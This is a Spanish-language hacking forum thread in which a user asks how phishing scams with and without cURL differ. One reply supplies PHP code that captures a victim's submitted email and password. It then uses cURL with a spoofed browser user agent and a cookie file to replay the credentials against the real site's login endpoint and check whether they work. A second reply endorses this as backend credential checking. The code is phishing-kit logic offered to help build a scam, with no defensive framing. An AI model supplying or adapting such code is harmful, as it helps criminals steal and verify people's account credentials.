Sólo texto | Texto con Imágenes

Underc0de

Foros Generales => Dudas y pedidos generales => Mensaje iniciado por: terr0r en Julio 28, 2017, 01:19:11 AM

Título: Duda sobre Pishing (Programación)
Publicado por: terr0r en Julio 28, 2017, 01:19:11 AM
Buenas, siempre escucho hablar de scams con Curl o sin Curl.. alguien me puede explicar la diferencia para este tipo de ataques
Título: Re:Duda sobre Pishing (Programación)
Publicado por: Stiuvert en Julio 28, 2017, 03:36:27 AM
Hola @terr0r (https://underc0de.org/foro/index.php?action=profile;u=49736),

cURL es útil para comunicarse con muchas APIs, para automatizar peticiones y enviar datos entre servidores.

Si deseo crear un Scam e implemento cURL en ciertas funciones lo que me hará será verificar la información asignada de estos valores. Si por el contrario no lo utilizo los valores introducidos en los campos no me los validara y serán enviados por un simple POST.

Código (php) [Seleccionar]
$user = $_POST[email]
$pass = $_POST[pass]

En cambio por cURL:

Código (php) [Seleccionar]
$ch = curl_init('http://miweb/login.php');
$useragent="Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1";
curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt ($ch, CURLOPT_POSTFIELDS, "email=$user&pass=$pass");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_COOKIEFILE, "/tmp/hola.txt");

$data = curl_exec($ch);
curl_close($ch);

Saludos
Título: Re:Duda sobre Pishing (Programación)
Publicado por: blackdrake en Julio 28, 2017, 07:16:19 PM
Así es, muy bien explicado por parte de @Stiuvert (https://underc0de.org/foro/index.php?action=profile;u=3790), resumiendo sirve para realizar vía backend una comprobación de las credenciales y saber si son correctas o no.

Un saludo.
Sólo texto | Texto con Imágenes